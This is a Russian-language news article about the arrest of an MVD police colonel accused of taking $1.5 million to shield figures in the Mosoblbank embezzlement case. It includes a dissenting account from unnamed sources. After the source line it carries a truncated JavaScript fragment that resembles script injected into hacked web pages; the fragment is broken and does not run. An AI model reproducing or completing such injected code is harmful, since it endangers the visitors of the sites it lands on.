Полковник МВД обещал свернуть дело Мособлбанка за $1,5 млн

0
12

ФСБ задержало замначальника полиции управления на транспорте МВД по Южному федеральному округу полковник Адама Яхутля, которого подозревают в крупном мошенничестве.

 

Следователи считают, что правоохранитель получил $1,5 млн, за которые обещал вывести из под статьи ряда фигурантов дела о хищении 70 млрд рублей из Мособлбанка. Об этом сообщает «Росбалт».

Как сообщают источники, Яхутль задержан в рамках дела, расследуемого столичным ГСУ СКР. Суд поместил подозреваемого под стражу. Пострадавшим в данном деле значится краснодарский бизнесмен Дмитрий Ганелин, которому принадлежит ряд фирм.

Как указал заявитель, у его структур имелись связи с Мособлбанком, а когда руководители кредитной организации оказались под следствием, проблемы возникли и у структур предпринимателя. Более того, он находился в приятельских отношениях с рядом топ-менеджеров Мособлбанка, в частности — с замглавой правления Дмитрием Васильевым. Пошли слухи, что Ганелин может пополнить число фигурантов. Его, якобы, могут признать соучастником хищения.

В связи с этим несколько лет назад бизнесмен обратился к Адаму Яхутулю, с которым был заочно знаком. Последний, заявив, что имеет связи в силовых структурах, в том числе —  в федеральных ведомствах, пообещал помочь. Ганелинутверждает, что полицейский обещал и вовсе закрыть дело о хищениях из Мособлбанка, либо вывести из числа фигурантов указанных лиц. Свою помощь Яхутль, по словам потерпевшего, оценил в $1,5 млн. Эти деньги он получил за несколько траншей. Передача денег происходила в Южном федеральном округе и в Москве. Позже Ганелин счел, что полицейский обещания не выполнил и написал заявление.

Впрочем, у осведомленных источников несколько иной взгляд на произошедшее. Они отмечают, что свидетели по делу (в том числе юрист фирм Ганелина) в своих показаниях указывают, что присутствовали при переговорах бизнесмена и Яхутля, первый жаловался, второй вскользь его комментировал, однако финансовые вопросы в присутствии третьих лиц не обсуждались и никто из свидетелей не слышал, чтобы полицейскому передавались какие-то суммы.

По словам собеседников, Васильев выделил крупную сумму (куда большую, чем $1,5 млн) на решение проблем с уголовным делом. Кому они достались догадаться не сложно, однако это был не Яхутль. Когда никаких подвижек с «решением» не произошло нашлось оправдание: мол, Яхутль взял деньги и ничего не сделал. Различные ведомства не менее пяти раз отказывали в возбуждении дела, а затем его неожиданно.

Дело по факту хищений в Мособлбанке возбудили три года назад. Следствие настаивает на том, что владельцы и руководители организации активно выводили деньги вкладчиков. В рамках хищений использовались различные схемы – от обналичивания в кассах до перевода на счета аффилированных компаний.

Мособлбанк попал под санацию по причине нехватки активов для расплаты по большому объему ранее скрытых обязательств перед гражданами. Изначально считалось, что таких вкладов примерно на 60 млрд рублей. Позже выяснилось, что речь идет уже примерно о 76 млрд рублей неучтенных обязательств, что на момент совершения преступления составляло порядка $2 млрд.

В числе фигурантов дела оказались экс-совладельцы Мособлбанка Анджей Мальчевский и его сын Александр Мальчевский, а также Виктор ЯнинЮлия Зединаи первый зампред Дмитрий Васильев. Последнему удалось скрыться от следствия, в настоящее время он числится в международном розыске.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here